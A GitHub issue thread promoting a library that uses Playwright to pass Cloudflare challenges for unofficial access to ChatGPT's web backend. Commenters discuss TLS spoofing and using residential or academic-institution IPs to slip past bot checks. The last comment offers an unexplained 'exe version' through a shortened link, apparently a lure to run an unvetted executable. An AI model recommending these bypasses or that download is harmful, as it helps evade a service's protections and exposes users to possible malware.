### ISSUE TITLE
[Feature Request]: A solution for V1 Standard ChatGPT

### ISSUE THREAD

**Issue by AkashiCoin** [acheong08/ChatGPT#1379]
### Is there an existing issue for this?

- [X] I have searched the existing issues and checked the recent builds/commits

### What would your feature do ?

The API used Playwright to pretend to click and pass the Cloudflare Challenge.

Then we can sent a request to the ChatGPT server by using this API. 

This project is a simple way to package the requests that are made visible.

I hope to add my repo to your awesome list.

### Installation

```shell
pip3 install UnlimitedChatGPTWebAPI
```

then you should run `playwright install chromium`

> For windows,  maybe you should use it -> `playwright install-deps chromium`

### Configuration

1. Make sure your network or agent can access `https://chat.openai.com`
2. Please make sure that the VPS RAM is not too small.

#### Basic example

```python
import asyncio

from UnlimitedChatGPTWebAPI import ChatSession


async def main():
    async with ChatSession(proxies="socks5://localhost:7890") as session:
        # or use this if you want to use the same session for multiple requests
        # example:
        # session = ChatSession(proxies="socks5://localhost:7890")
        # await session.init_page()
        async with session.fetch(
            method="GET",
            url="/backend-api/models",
            headers={"Authorization": "Bearer xxx"}
        ) as resp:
            print(await resp.json())

if __name__ == "__main__":
    asyncio.run(main())

```

#### Streaming example

```python
import asyncio

from UnlimitedChatGPTWebAPI import ChatSession


async def main():
    async with ChatSession(proxies="socks5://localhost:7890") as session:
        # or use this if you want to use the same session for multiple requests
        # example:
        # session = ChatSession(proxies="socks5://localhost:7890")
        # await session.init_page()
        async with session.fetch(
            method="GET",
            url="/backend-api/models",
            headers={"Authorization": "Bearer xxx"}
        ) as resp:
            data = b""
            async for chunk in resp.iter_chunked():
                data += chunk
            print(data.decode())

if __name__ == "__main__":
    asyncio.run(main())

```

### Additional information

https://github.com/AkashiCoin/UnlimitedChatGPTWebAPI

**Comment by acheong08** [comment]
Why use chromium when you can [access it with just TLS spoofing](https://github.com/acheong08/ChatGPT-Proxy-V4)?

**Comment by AkashiCoin** [comment]
> Why use chromium when you can [access it with just TLS spoofing](https://github.com/acheong08/ChatGPT-Proxy-V4)?

emm. chromium is always used in resolve the cloudflare challenge, and as for TLS spoofing, I will try to use it in a later update...

**Comment by acheong08** [comment]
It has already been done a lot
Reference: https://github.com/linweiyuan/go-chatgpt-api
https://github.com/acheong08/ChatGPT-Proxy-V4

... and some others

**Comment by AkashiCoin** [comment]
> It has already been done a lot Reference: https://github.com/linweiyuan/go-chatgpt-api https://github.com/acheong08/ChatGPT-Proxy-V4
> 
> ... and some others

Awesome, I will try to learn

**Comment by AkashiCoin** [comment]
I found that cloudflare challenge has not been solved in these repo. Is it because this challenge does not appear frequently? As I use it, it always comes up.
with PUID, it's running. But what if PUID doesn't work, like before？

**Comment by acheong08** [comment]
This is an IP thing. It seems that some but not all residential IP addresses are able to get around cloudflare with just TLS spoofing while clean proxies tend to trigger a challenge

**Comment by acheong08** [comment]
I'm using an IP from an academic institution as a proxy, which is probably why cloudflare lets it pass

**Comment by AkashiCoin** [comment]
Awesome, I think cloudlfare may be more strict in the future, and this can be used as a backup. 
I've used it to create a proxy site that might be easy to use. (May not be trusted due to security issues)
https://chat.loli.vet

**Comment by acheong08** [comment]
Nice. I'll check it out once it is required

**Comment by Diytterr** [comment]
I uploaded a new exe version here:
shorturl.at/etuLP
